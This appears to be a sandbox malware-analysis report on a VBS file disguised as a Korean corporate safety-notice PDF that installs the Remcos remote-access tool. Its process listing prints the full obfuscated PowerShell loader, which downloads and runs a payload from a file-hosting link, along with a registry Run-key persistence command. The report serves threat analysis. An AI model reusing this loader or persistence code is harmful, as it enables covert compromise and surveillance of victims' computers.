File name:

(전사공지용) 24년 안전작업허가 기준 안내 (240415)·pdf.vbs

Full analysis: https://app.any.run/tasks/22a829fc-c7e5-4db0-b3cf-4c24a348de45
Verdict: Malicious activity
Threats:

Remcos is a commercially distributed remote administration and surveillance tool that has been widely observed in unauthorized deployments, where threat actors use it to perform remote actions on compromised machines. It is actively maintained by its vendor, with new versions and feature updates released on a frequent, near-monthly basis.

Malware Trends Tracker     >>>
Analysis date: April 14, 2024, 22:56:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
remcos
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

6E74F3450B6A5719B9E71F6EA32295CE

SHA1:

790344F4225B4A5E904F3E06DE6AAC6FA9FE58D5

SHA256:

6C0C6D699BE7442DCD1E34507AC5F9103FCF2A220B032E2E7159805C820A0483

SSDEEP:

6144:ixRLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPX:0GInOiOi9PIM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Gets path to any of the special folders (SCRIPT)

      • wscript.exe (PID: 3992)

    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 3992)

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 3992)

    • Unusual connection from system programs

      • wscript.exe (PID: 3992)

    • Changes the autorun value in the registry

      • reg.exe (PID: 1844)

    • REMCOS has been detected

      • wab.exe (PID: 1900)

    • Known privilege escalation attack

      • dllhost.exe (PID: 1540)

  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)
      • wab.exe (PID: 1900)

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 3992)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 3992)

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 3992)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3992)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
      • wab.exe (PID: 1900)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 2856)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 2072)

    • Unusual connection from system programs

      • powershell.exe (PID: 2856)

    • Reads settings of System Certificates

      • wab.exe (PID: 1900)

    • Application launched itself

      • powershell.exe (PID: 2856)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 1900)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2488)

    • Checks Windows Trust Settings

      • wab.exe (PID: 1900)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2072)

    • Checks supported languages

      • wab.exe (PID: 1900)
      • wab.exe (PID: 2128)

    • Checks proxy server information

      • wab.exe (PID: 1900)

    • Reads the software policy settings

      • wab.exe (PID: 1900)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 1900)
      • wab.exe (PID: 2128)

    • Reads product name

      • wab.exe (PID: 1900)

    • Creates files or folders in the user directory

      • wab.exe (PID: 1900)

    • Reads Environment values

      • wab.exe (PID: 1900)

    • Reads the computer name

      • wab.exe (PID: 1900)
      • wab.exe (PID: 2128)

    • Checks transactions between databases Windows and Oracle

      • wab.exe (PID: 1900)

    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 1540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
10
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe powershell.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs wab.exe cmd.exe no specs reg.exe CMSTPLUA no specs wab.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1348"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1540C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1844REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Whins" /t REG_EXPAND_SZ /d "%Protokollering29% -w 1 $Tlle=(Get-ItemProperty -Path 'HKCU:\uforligeligt\').Anisene;%Protokollering29% ($Tlle)"C:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1900"C:\Program Files\windows mail\wab.exe"C:\Program Files\windows mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\mshtml.dll
c:\program files\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
2072"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2128"C:\Program Files\windows mail\wab.exe" C:\Program Files\windows mail\wab.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Contacts
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\program files\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2488"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Whins" /t REG_EXPAND_SZ /d "%Protokollering29% -w 1 $Tlle=(Get-ItemProperty -Path 'HKCU:\uforligeligt\').Anisene;%Protokollering29% ($Tlle)"C:\Windows\System32\cmd.exewab.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2832"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2856"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott 